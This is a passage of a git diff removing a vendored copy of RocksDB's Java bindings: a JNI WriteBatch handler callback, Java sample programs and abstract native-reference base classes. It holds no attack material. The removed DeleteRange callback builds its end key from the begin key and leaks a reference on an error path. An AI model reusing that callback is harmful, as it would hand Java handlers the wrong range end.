-  m_jLogDataMethodId = WriteBatchHandlerJni::getLogDataMethodId(env);
-  if(m_jLogDataMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-
-  m_jContinueMethodId = WriteBatchHandlerJni::getContinueMethodId(env);
-  if(m_jContinueMethodId == nullptr) {
-    // exception thrown
-    return;
-  }
-}
-
-void WriteBatchHandlerJniCallback::Put(const Slice& key, const Slice& value) {
-  const jbyteArray j_key = sliceToJArray(key);
-  if(j_key == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  const jbyteArray j_value = sliceToJArray(value);
-  if(j_value == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    if(j_key != nullptr) {
-      m_env->DeleteLocalRef(j_key);
-    }
-    return;
-  }
-
-  m_env->CallVoidMethod(
-      m_jWriteBatchHandler,
-      m_jPutMethodId,
-      j_key,
-      j_value);
-  if(m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-    if(j_value != nullptr) {
-      m_env->DeleteLocalRef(j_value);
-    }
-    if(j_key != nullptr) {
-      m_env->DeleteLocalRef(j_key);
-    }
-    return;
-  }
-
-  if(j_value != nullptr) {
-    m_env->DeleteLocalRef(j_value);
-  }
-  if(j_key != nullptr) {
-    m_env->DeleteLocalRef(j_key);
-  }
-}
-
-void WriteBatchHandlerJniCallback::Merge(const Slice& key, const Slice& value) {
-  const jbyteArray j_key = sliceToJArray(key);
-  if(j_key == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  const jbyteArray j_value = sliceToJArray(value);
-  if(j_value == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    if(j_key != nullptr) {
-      m_env->DeleteLocalRef(j_key);
-    }
-    return;
-  }
-
-  m_env->CallVoidMethod(
-      m_jWriteBatchHandler,
-      m_jMergeMethodId,
-      j_key,
-      j_value);
-  if(m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-    if(j_value != nullptr) {
-      m_env->DeleteLocalRef(j_value);
-    }
-    if(j_key != nullptr) {
-      m_env->DeleteLocalRef(j_key);
-    }
-    return;
-  }
-
-  if(j_value != nullptr) {
-    m_env->DeleteLocalRef(j_value);
-  }
-  if(j_key != nullptr) {
-    m_env->DeleteLocalRef(j_key);
-  }
-}
-
-void WriteBatchHandlerJniCallback::Delete(const Slice& key) {
-  const jbyteArray j_key = sliceToJArray(key);
-  if(j_key == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  m_env->CallVoidMethod(
-      m_jWriteBatchHandler,
-      m_jDeleteMethodId,
-      j_key);
-  if(m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-    if(j_key != nullptr) {
-      m_env->DeleteLocalRef(j_key);
-    }
-    return;
-  }
-
-  if(j_key != nullptr) {
-    m_env->DeleteLocalRef(j_key);
-  }
-}
-
-void WriteBatchHandlerJniCallback::DeleteRange(const Slice& beginKey,
-                                               const Slice& endKey) {
-  const jbyteArray j_beginKey = sliceToJArray(beginKey);
-  if (j_beginKey == nullptr) {
-    // exception thrown
-    if (m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  const jbyteArray j_endKey = sliceToJArray(beginKey);
-  if (j_endKey == nullptr) {
-    // exception thrown
-    if (m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  m_env->CallVoidMethod(m_jWriteBatchHandler, m_jDeleteRangeMethodId,
-                        j_beginKey, j_endKey);
-  if (m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-    if (j_beginKey != nullptr) {
-      m_env->DeleteLocalRef(j_beginKey);
-    }
-    if (j_endKey != nullptr) {
-      m_env->DeleteLocalRef(j_endKey);
-    }
-    return;
-  }
-
-  if (j_beginKey != nullptr) {
-    m_env->DeleteLocalRef(j_beginKey);
-  }
-
-  if (j_endKey != nullptr) {
-    m_env->DeleteLocalRef(j_endKey);
-  }
-}
-
-void WriteBatchHandlerJniCallback::LogData(const Slice& blob) {
-  const jbyteArray j_blob = sliceToJArray(blob);
-  if(j_blob == nullptr) {
-    // exception thrown
-    if(m_env->ExceptionCheck()) {
-      m_env->ExceptionDescribe();
-    }
-    return;
-  }
-
-  m_env->CallVoidMethod(
-      m_jWriteBatchHandler,
-      m_jLogDataMethodId,
-      j_blob);
-  if(m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-    if(j_blob != nullptr) {
-      m_env->DeleteLocalRef(j_blob);
-    }
-    return;
-  }
-
-  if(j_blob != nullptr) {
-    m_env->DeleteLocalRef(j_blob);
-  }
-}
-
-bool WriteBatchHandlerJniCallback::Continue() {
-  jboolean jContinue = m_env->CallBooleanMethod(
-      m_jWriteBatchHandler,
-      m_jContinueMethodId);
-  if(m_env->ExceptionCheck()) {
-    // exception thrown
-    m_env->ExceptionDescribe();
-  }
-
-  return static_cast<bool>(jContinue == JNI_TRUE);
-}
-
-/*
- * Creates a Java Byte Array from the data in a Slice
- *
- * When calling this function
- * you must remember to call env->DeleteLocalRef
- * on the result after you have finished with it
- *
- * @param s A Slice to convery to a Java byte array
- *
- * @return A reference to a Java byte array, or a nullptr if an
- *     exception occurs
- */
-jbyteArray WriteBatchHandlerJniCallback::sliceToJArray(const Slice& s) {
-  jbyteArray ja = m_env->NewByteArray(static_cast<jsize>(s.size()));
-  if(ja == nullptr) {
-    // exception thrown: OutOfMemoryError
-    return nullptr;
-  }
-
-  m_env->SetByteArrayRegion(
-      ja, 0, static_cast<jsize>(s.size()),
-      const_cast<jbyte*>(reinterpret_cast<const jbyte*>(s.data())));
-  if(m_env->ExceptionCheck()) {
-    if(ja != nullptr) {
-      m_env->DeleteLocalRef(ja);
-    }
-    // exception thrown: ArrayIndexOutOfBoundsException
-    return nullptr;
-  }
-
-  return ja;
-}
-
-WriteBatchHandlerJniCallback::~WriteBatchHandlerJniCallback() {
-  if(m_jWriteBatchHandler != nullptr) {
-    m_env->DeleteGlobalRef(m_jWriteBatchHandler);
-  }
-}
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.h b/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.h
deleted file mode 100644
index 5d3dee3..0000000
--- a/thirdparty/rocksdb/java/rocksjni/writebatchhandlerjnicallback.h
+++ /dev/null
@@ -1,48 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// This file implements the callback "bridge" between Java and C++ for
-// rocksdb::WriteBatch::Handler.
-
-#ifndef JAVA_ROCKSJNI_WRITEBATCHHANDLERJNICALLBACK_H_
-#define JAVA_ROCKSJNI_WRITEBATCHHANDLERJNICALLBACK_H_
-
-#include <jni.h>
-#include "rocksdb/write_batch.h"
-
-namespace rocksdb {
-/**
- * This class acts as a bridge between C++
- * and Java. The methods in this class will be
- * called back from the RocksDB storage engine (C++)
- * which calls the appropriate Java method.
- * This enables Write Batch Handlers to be implemented in Java.
- */
-class WriteBatchHandlerJniCallback : public WriteBatch::Handler {
- public:
-    WriteBatchHandlerJniCallback(
-      JNIEnv* env, jobject jWriteBackHandler);
-    ~WriteBatchHandlerJniCallback();
-    void Put(const Slice& key, const Slice& value);
-    void Merge(const Slice& key, const Slice& value);
-    void Delete(const Slice& key);
-    void DeleteRange(const Slice& beginKey, const Slice& endKey);
-    void LogData(const Slice& blob);
-    bool Continue();
-
- private:
-    JNIEnv* m_env;
-    jobject m_jWriteBatchHandler;
-    jbyteArray sliceToJArray(const Slice& s);
-    jmethodID m_jPutMethodId;
-    jmethodID m_jMergeMethodId;
-    jmethodID m_jDeleteMethodId;
-    jmethodID m_jDeleteRangeMethodId;
-    jmethodID m_jLogDataMethodId;
-    jmethodID m_jContinueMethodId;
-};
-}  // namespace rocksdb
-
-#endif  // JAVA_ROCKSJNI_WRITEBATCHHANDLERJNICALLBACK_H_
diff --git a/thirdparty/rocksdb/java/samples/src/main/java/RocksDBColumnFamilySample.java b/thirdparty/rocksdb/java/samples/src/main/java/RocksDBColumnFamilySample.java
deleted file mode 100644
index 650b1b2..0000000
--- a/thirdparty/rocksdb/java/samples/src/main/java/RocksDBColumnFamilySample.java
+++ /dev/null
@@ -1,78 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-import org.rocksdb.*;
-
-import java.util.ArrayList;
-import java.util.List;
-
-public class RocksDBColumnFamilySample {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  public static void main(final String[] args) throws RocksDBException {
-    if (args.length < 1) {
-      System.out.println(
-          "usage: RocksDBColumnFamilySample db_path");
-      System.exit(-1);
-    }
-
-    final String db_path = args[0];
-
-    System.out.println("RocksDBColumnFamilySample");
-    try(final Options options = new Options().setCreateIfMissing(true);
-        final RocksDB db = RocksDB.open(options, db_path)) {
-
-      assert(db != null);
-
-      // create column family
-      try(final ColumnFamilyHandle columnFamilyHandle = db.createColumnFamily(
-          new ColumnFamilyDescriptor("new_cf".getBytes(),
-          new ColumnFamilyOptions()))) {
-        assert (columnFamilyHandle != null);
-      }
-    }
-
-    // open DB with two column families
-    final List<ColumnFamilyDescriptor> columnFamilyDescriptors =
-        new ArrayList<>();
-    // have to open default column family
-    columnFamilyDescriptors.add(new ColumnFamilyDescriptor(
-        RocksDB.DEFAULT_COLUMN_FAMILY, new ColumnFamilyOptions()));
-    // open the new one, too
-    columnFamilyDescriptors.add(new ColumnFamilyDescriptor(
-        "new_cf".getBytes(), new ColumnFamilyOptions()));
-    final List<ColumnFamilyHandle> columnFamilyHandles = new ArrayList<>();
-    try(final DBOptions options = new DBOptions();
-        final RocksDB db = RocksDB.open(options, db_path,
-            columnFamilyDescriptors, columnFamilyHandles)) {
-      assert(db != null);
-
-      try {
-        // put and get from non-default column family
-        db.put(columnFamilyHandles.get(0), new WriteOptions(),
-            "key".getBytes(), "value".getBytes());
-
-        // atomic write
-        try (final WriteBatch wb = new WriteBatch()) {
-          wb.put(columnFamilyHandles.get(0), "key2".getBytes(),
-              "value2".getBytes());
-          wb.put(columnFamilyHandles.get(1), "key3".getBytes(),
-              "value3".getBytes());
-          wb.remove(columnFamilyHandles.get(0), "key".getBytes());
-          db.write(new WriteOptions(), wb);
-        }
-
-        // drop column family
-        db.dropColumnFamily(columnFamilyHandles.get(1));
-      } finally {
-        for (final ColumnFamilyHandle handle : columnFamilyHandles) {
-          handle.close();
-        }
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/samples/src/main/java/RocksDBSample.java b/thirdparty/rocksdb/java/samples/src/main/java/RocksDBSample.java
deleted file mode 100644
index f61995e..0000000
--- a/thirdparty/rocksdb/java/samples/src/main/java/RocksDBSample.java
+++ /dev/null
@@ -1,303 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-import java.lang.IllegalArgumentException;
-import java.util.Arrays;
-import java.util.List;
-import java.util.Map;
-import java.util.ArrayList;
-
-import org.rocksdb.*;
-import org.rocksdb.util.SizeUnit;
-
-public class RocksDBSample {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  public static void main(final String[] args) {
-    if (args.length < 1) {
-      System.out.println("usage: RocksDBSample db_path");
-      System.exit(-1);
-    }
-
-    final String db_path = args[0];
-    final String db_path_not_found = db_path + "_not_found";
-
-    System.out.println("RocksDBSample");
-    try (final Options options = new Options();
-         final Filter bloomFilter = new BloomFilter(10);
-         final ReadOptions readOptions = new ReadOptions()
-             .setFillCache(false);
-         final Statistics stats = new Statistics();
-         final RateLimiter rateLimiter = new RateLimiter(10000000,10000, 10)) {
-
-      try (final RocksDB db = RocksDB.open(options, db_path_not_found)) {
-        assert (false);
-      } catch (final RocksDBException e) {
-        System.out.format("Caught the expected exception -- %s\n", e);
-      }
-
-      try {
-        options.setCreateIfMissing(true)
-            .setStatistics(stats)
-            .setWriteBufferSize(8 * SizeUnit.KB)
-            .setMaxWriteBufferNumber(3)
-            .setMaxBackgroundCompactions(10)
-            .setCompressionType(CompressionType.SNAPPY_COMPRESSION)
-            .setCompactionStyle(CompactionStyle.UNIVERSAL);
-      } catch (final IllegalArgumentException e) {
-        assert (false);
-      }
-
-      assert (options.createIfMissing() == true);
-      assert (options.writeBufferSize() == 8 * SizeUnit.KB);
-      assert (options.maxWriteBufferNumber() == 3);
-      assert (options.maxBackgroundCompactions() == 10);
-      assert (options.compressionType() == CompressionType.SNAPPY_COMPRESSION);
-      assert (options.compactionStyle() == CompactionStyle.UNIVERSAL);
-
-      assert (options.memTableFactoryName().equals("SkipListFactory"));
-      options.setMemTableConfig(
-          new HashSkipListMemTableConfig()
-              .setHeight(4)
-              .setBranchingFactor(4)
-              .setBucketCount(2000000));
-      assert (options.memTableFactoryName().equals("HashSkipListRepFactory"));
-
-      options.setMemTableConfig(
-          new HashLinkedListMemTableConfig()
-              .setBucketCount(100000));
-      assert (options.memTableFactoryName().equals("HashLinkedListRepFactory"));
-
-      options.setMemTableConfig(
-          new VectorMemTableConfig().setReservedSize(10000));
-      assert (options.memTableFactoryName().equals("VectorRepFactory"));
-
-      options.setMemTableConfig(new SkipListMemTableConfig());
-      assert (options.memTableFactoryName().equals("SkipListFactory"));
-
-      options.setTableFormatConfig(new PlainTableConfig());
-      // Plain-Table requires mmap read
-      options.setAllowMmapReads(true);
-      assert (options.tableFactoryName().equals("PlainTable"));
-
-      options.setRateLimiter(rateLimiter);
-
-      final BlockBasedTableConfig table_options = new BlockBasedTableConfig();
-      table_options.setBlockCacheSize(64 * SizeUnit.KB)
-          .setFilter(bloomFilter)
-          .setCacheNumShardBits(6)
-          .setBlockSizeDeviation(5)
-          .setBlockRestartInterval(10)
-          .setCacheIndexAndFilterBlocks(true)
-          .setHashIndexAllowCollision(false)
-          .setBlockCacheCompressedSize(64 * SizeUnit.KB)
-          .setBlockCacheCompressedNumShardBits(10);
-
-      assert (table_options.blockCacheSize() == 64 * SizeUnit.KB);
-      assert (table_options.cacheNumShardBits() == 6);
-      assert (table_options.blockSizeDeviation() == 5);
-      assert (table_options.blockRestartInterval() == 10);
-      assert (table_options.cacheIndexAndFilterBlocks() == true);
-      assert (table_options.hashIndexAllowCollision() == false);
-      assert (table_options.blockCacheCompressedSize() == 64 * SizeUnit.KB);
-      assert (table_options.blockCacheCompressedNumShardBits() == 10);
-
-      options.setTableFormatConfig(table_options);
-      assert (options.tableFactoryName().equals("BlockBasedTable"));
-
-      try (final RocksDB db = RocksDB.open(options, db_path)) {
-        db.put("hello".getBytes(), "world".getBytes());
-
-        final byte[] value = db.get("hello".getBytes());
-        assert ("world".equals(new String(value)));
-
-        final String str = db.getProperty("rocksdb.stats");
-        assert (str != null && !str.equals(""));
-      } catch (final RocksDBException e) {
-        System.out.format("[ERROR] caught the unexpected exception -- %s\n", e);
-        assert (false);
-      }
-
-      try (final RocksDB db = RocksDB.open(options, db_path)) {
-        db.put("hello".getBytes(), "world".getBytes());
-        byte[] value = db.get("hello".getBytes());
-        System.out.format("Get('hello') = %s\n",
-            new String(value));
-
-        for (int i = 1; i <= 9; ++i) {
-          for (int j = 1; j <= 9; ++j) {
-            db.put(String.format("%dx%d", i, j).getBytes(),
-                String.format("%d", i * j).getBytes());
-          }
-        }
-
-        for (int i = 1; i <= 9; ++i) {
-          for (int j = 1; j <= 9; ++j) {
-            System.out.format("%s ", new String(db.get(
-                String.format("%dx%d", i, j).getBytes())));
-          }
-          System.out.println("");
-        }
-
-        // write batch test
-        try (final WriteOptions writeOpt = new WriteOptions()) {
-          for (int i = 10; i <= 19; ++i) {
-            try (final WriteBatch batch = new WriteBatch()) {
-              for (int j = 10; j <= 19; ++j) {
-                batch.put(String.format("%dx%d", i, j).getBytes(),
-                    String.format("%d", i * j).getBytes());
-              }
-              db.write(writeOpt, batch);
-            }
-          }
-        }
-        for (int i = 10; i <= 19; ++i) {
-          for (int j = 10; j <= 19; ++j) {
-            assert (new String(
-                db.get(String.format("%dx%d", i, j).getBytes())).equals(
-                String.format("%d", i * j)));
-            System.out.format("%s ", new String(db.get(
-                String.format("%dx%d", i, j).getBytes())));
-          }
-          System.out.println("");
-        }
-
-        value = db.get("1x1".getBytes());
-        assert (value != null);
-        value = db.get("world".getBytes());
-        assert (value == null);
-        value = db.get(readOptions, "world".getBytes());
-        assert (value == null);
-
-        final byte[] testKey = "asdf".getBytes();
-        final byte[] testValue =
-            "asdfghjkl;'?><MNBVCXZQWERTYUIOP{+_)(*&^%$#@".getBytes();
-        db.put(testKey, testValue);
-        byte[] testResult = db.get(testKey);
-        assert (testResult != null);
-        assert (Arrays.equals(testValue, testResult));
-        assert (new String(testValue).equals(new String(testResult)));
-        testResult = db.get(readOptions, testKey);
-        assert (testResult != null);
-        assert (Arrays.equals(testValue, testResult));
-        assert (new String(testValue).equals(new String(testResult)));
-
-        final byte[] insufficientArray = new byte[10];
-        final byte[] enoughArray = new byte[50];
-        int len;
-        len = db.get(testKey, insufficientArray);
-        assert (len > insufficientArray.length);
-        len = db.get("asdfjkl;".getBytes(), enoughArray);
-        assert (len == RocksDB.NOT_FOUND);
-        len = db.get(testKey, enoughArray);
-        assert (len == testValue.length);
-
-        len = db.get(readOptions, testKey, insufficientArray);
-        assert (len > insufficientArray.length);
-        len = db.get(readOptions, "asdfjkl;".getBytes(), enoughArray);
-        assert (len == RocksDB.NOT_FOUND);
-        len = db.get(readOptions, testKey, enoughArray);
-        assert (len == testValue.length);
-
-        db.remove(testKey);
-        len = db.get(testKey, enoughArray);
-        assert (len == RocksDB.NOT_FOUND);
-
-        // repeat the test with WriteOptions
-        try (final WriteOptions writeOpts = new WriteOptions()) {
-          writeOpts.setSync(true);
-          writeOpts.setDisableWAL(true);
-          db.put(writeOpts, testKey, testValue);
-          len = db.get(testKey, enoughArray);
-          assert (len == testValue.length);
-          assert (new String(testValue).equals(
-              new String(enoughArray, 0, len)));
-        }
-
-        try {
-          for (final TickerType statsType : TickerType.values()) {
-            if (statsType != TickerType.TICKER_ENUM_MAX) {
-              stats.getTickerCount(statsType);
-            }
-          }
-          System.out.println("getTickerCount() passed.");
-        } catch (final Exception e) {
-          System.out.println("Failed in call to getTickerCount()");
-          assert (false); //Should never reach here.
-        }
-
-        try {
-          for (final HistogramType histogramType : HistogramType.values()) {
-            if (histogramType != HistogramType.HISTOGRAM_ENUM_MAX) {
-              HistogramData data = stats.getHistogramData(histogramType);
-            }
-          }
-          System.out.println("getHistogramData() passed.");
-        } catch (final Exception e) {
-          System.out.println("Failed in call to getHistogramData()");
-          assert (false); //Should never reach here.
-        }
-
-        try (final RocksIterator iterator = db.newIterator()) {
-
-          boolean seekToFirstPassed = false;
-          for (iterator.seekToFirst(); iterator.isValid(); iterator.next()) {
-            iterator.status();
-            assert (iterator.key() != null);
-            assert (iterator.value() != null);
-            seekToFirstPassed = true;
-          }
-          if (seekToFirstPassed) {
-            System.out.println("iterator seekToFirst tests passed.");
-          }
-
-          boolean seekToLastPassed = false;
-          for (iterator.seekToLast(); iterator.isValid(); iterator.prev()) {
-            iterator.status();
-            assert (iterator.key() != null);
-            assert (iterator.value() != null);
-            seekToLastPassed = true;
-          }
-
-          if (seekToLastPassed) {
-            System.out.println("iterator seekToLastPassed tests passed.");
-          }
-
-          iterator.seekToFirst();
-          iterator.seek(iterator.key());
-          assert (iterator.key() != null);
-          assert (iterator.value() != null);
-
-          System.out.println("iterator seek test passed.");
-
-        }
-        System.out.println("iterator tests passed.");
-
-        final List<byte[]> keys = new ArrayList<>();
-        try (final RocksIterator iterator = db.newIterator()) {
-          for (iterator.seekToLast(); iterator.isValid(); iterator.prev()) {
-            keys.add(iterator.key());
-          }
-        }
-
-        Map<byte[], byte[]> values = db.multiGet(keys);
-        assert (values.size() == keys.size());
-        for (final byte[] value1 : values.values()) {
-          assert (value1 != null);
-        }
-
-        values = db.multiGet(new ReadOptions(), keys);
-        assert (values.size() == keys.size());
-        for (final byte[] value1 : values.values()) {
-          assert (value1 != null);
-        }
-      } catch (final RocksDBException e) {
-        System.err.println(e);
-      }
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java
deleted file mode 100644
index 976401f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java
+++ /dev/null
@@ -1,30 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * A CompactionFilter allows an application to modify/delete a key-value at
- * the time of compaction.
- *
- * At present we just permit an overriding Java class to wrap a C++
- * implementation
- */
-public abstract class AbstractCompactionFilter<T extends AbstractSlice<?>>
-    extends RocksObject {
-
-  protected AbstractCompactionFilter(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * Deletes underlying C++ compaction pointer.
-   *
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the compaction filter are closed.
-   * Otherwise an undefined behavior will occur.
-   */
-  @Override
-  protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractComparator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractComparator.java
deleted file mode 100644
index 0fc4a19..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractComparator.java
+++ /dev/null
@@ -1,106 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Comparators are used by RocksDB to determine
- * the ordering of keys.
- *
- * This class is package private, implementers
- * should extend either of the public abstract classes:
- *   @see org.rocksdb.Comparator
- *   @see org.rocksdb.DirectComparator
- */
-public abstract class AbstractComparator<T extends AbstractSlice<?>>
-    extends AbstractImmutableNativeReference {
-
-  protected AbstractComparator() {
-    super(true);
-  }
-
-  /**
-   * The name of the comparator.  Used to check for comparator
-   * mismatches (i.e., a DB created with one comparator is
-   * accessed using a different comparator).
-   *
-   * A new name should be used whenever
-   * the comparator implementation changes in a way that will cause
-   * the relative ordering of any two keys to change.
-   *
-   * Names starting with "rocksdb." are reserved and should not be used.
-   *
-   * @return The name of this comparator implementation
-   */
-  public abstract String name();
-
-  /**
-   * Three-way key comparison
-   *
-   *  @param a Slice access to first key
-   *  @param b Slice access to second key
-   *
-   *  @return Should return either:
-   *    1) &lt; 0 if "a" &lt; "b"
-   *    2) == 0 if "a" == "b"
-   *    3) &gt; 0 if "a" &gt; "b"
-   */
-  public abstract int compare(final T a, final T b);
-
-  /**
-   * <p>Used to reduce the space requirements
-   * for internal data structures like index blocks.</p>
-   *
-   * <p>If start &lt; limit, you may return a new start which is a
-   * shorter string in [start, limit).</p>
-   *
-   * <p>Simple comparator implementations may return null if they
-   * wish to use start unchanged. i.e., an implementation of
-   * this method that does nothing is correct.</p>
-   *
-   * @param start String
-   * @param limit of type T
-   *
-   * @return a shorter start, or null
-   */
-  public String findShortestSeparator(final String start, final T limit) {
-      return null;
-  }
-
-  /**
-   * <p>Used to reduce the space requirements
-   * for internal data structures like index blocks.</p>
-   *
-   * <p>You may return a new short key (key1) where
-   * key1 &ge; key.</p>
-   *
-   * <p>Simple comparator implementations may return null if they
-   * wish to leave the key unchanged. i.e., an implementation of
-   * this method that does nothing is correct.</p>
-   *
-   * @param key String
-   *
-   * @return a shorter key, or null
-   */
-  public String findShortSuccessor(final String key) {
-      return null;
-  }
-
-  /**
-   * Deletes underlying C++ comparator pointer.
-   *
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the comparator are closed.
-   * Otherwise an undefined behavior will occur.
-   */
-  @Override
-  protected void disposeInternal() {
-    disposeInternal(getNativeHandle());
-  }
-
-  protected abstract long getNativeHandle();
-
-  private native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java
deleted file mode 100644
index b1dc1ef..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java
+++ /dev/null
@@ -1,66 +0,0 @@
-// Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.concurrent.atomic.AtomicBoolean;
-
-/**
- * Offers functionality for implementations of
- * {@link AbstractNativeReference} which have an immutable reference to the
- * underlying native C++ object
- */
-public abstract class AbstractImmutableNativeReference
-    extends AbstractNativeReference {
-
-  /**
-   * A flag indicating whether the current {@code AbstractNativeReference} is
-   * responsible to free the underlying C++ object
-   */
-  private final AtomicBoolean owningHandle_;
-
-  protected AbstractImmutableNativeReference(final boolean owningHandle) {
-    this.owningHandle_ = new AtomicBoolean(owningHandle);
-  }
-
-  @Override
-  public boolean isOwningHandle() {
-    return owningHandle_.get();
-  }
-
-  /**
-   * Releases this {@code AbstractNativeReference} from  the responsibility of
-   * freeing the underlying native C++ object
-   * <p>
-   * This will prevent the object from attempting to delete the underlying
-   * native object in its finalizer. This must be used when another object
-   * takes over ownership of the native object or both will attempt to delete
-   * the underlying object when garbage collected.
-   * <p>
-   * When {@code disOwnNativeHandle()} is called, {@code dispose()} will
-   * subsequently take no action. As a result, incorrect use of this function
-   * may cause a memory leak.
-   * </p>
-   *
-   * @see #dispose()
-   */
-  protected final void disOwnNativeHandle() {
-    owningHandle_.set(false);
-  }
-
-  @Override
-  public void close() {
-    if (owningHandle_.compareAndSet(true, false)) {
-      disposeInternal();
-    }
-  }
-
-  /**
-   * The helper function of {@link AbstractImmutableNativeReference#dispose()}
-   * which all subclasses of {@code AbstractImmutableNativeReference} must
-   * implement to release their underlying native C++ objects.
-   */
-  protected abstract void disposeInternal();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractNativeReference.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractNativeReference.java
deleted file mode 100644
index ffb0776..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractNativeReference.java
+++ /dev/null
@@ -1,76 +0,0 @@
-// Copyright (c) 2016, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * AbstractNativeReference is the base-class of all RocksDB classes that have
- * a pointer to a native C++ {@code rocksdb} object.
- * <p>
- * AbstractNativeReference has the {@link AbstractNativeReference#dispose()}
- * method, which frees its associated C++ object.</p>
- * <p>
- * This function should be called manually, however, if required it will be
- * called automatically during the regular Java GC process via
- * {@link AbstractNativeReference#finalize()}.</p>
- * <p>
- * Note - Java can only see the long member variable (which is the C++ pointer
- * value to the native object), as such it does not know the real size of the
- * object and therefore may assign a low GC priority for it; So it is strongly
- * suggested that you manually dispose of objects when you are finished with
- * them.</p>
- */
-public abstract class AbstractNativeReference implements AutoCloseable {
-
-  /**
-   * Returns true if we are responsible for freeing the underlying C++ object
-   *
-   * @return true if we are responsible to free the C++ object
-   * @see #dispose()
-   */
-  protected abstract boolean isOwningHandle();
-
-  /**
-   * Frees the underlying C++ object
-   * <p>
-   * It is strong recommended that the developer calls this after they
-   * have finished using the object.</p>
-   * <p>
-   * Note, that once an instance of {@link AbstractNativeReference} has been
-   * disposed, calling any of its functions will lead to undefined
-   * behavior.</p>
-   */
-  @Override
-  public abstract void close();
-
-  /**
-   * @deprecated Instead use {@link AbstractNativeReference#close()}
-   */
-  @Deprecated
-  public final void dispose() {
-    close();
-  }
-
-  /**
-   * Simply calls {@link AbstractNativeReference#dispose()} to free
-   * any underlying C++ object reference which has not yet been manually
-   * released.
-   *
-   * @deprecated You should not rely on GC of Rocks objects, and instead should
-   * either call {@link AbstractNativeReference#close()} manually or make
-   * use of some sort of ARM (Automatic Resource Management) such as
-   * Java 7's <a href="https://docs.oracle.com/javase/tutorial/essential/exceptions/tryResourceClose.html">try-with-resources</a>
-   * statement
-   */
-  @Override
-  @Deprecated
-  protected void finalize() throws Throwable {
-    if(isOwningHandle()) {
-      //TODO(AR) log a warning message... developer should have called close()
-    }
-    dispose();
-    super.finalize();
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractRocksIterator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractRocksIterator.java
deleted file mode 100644
index 52bd00f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/AbstractRocksIterator.java
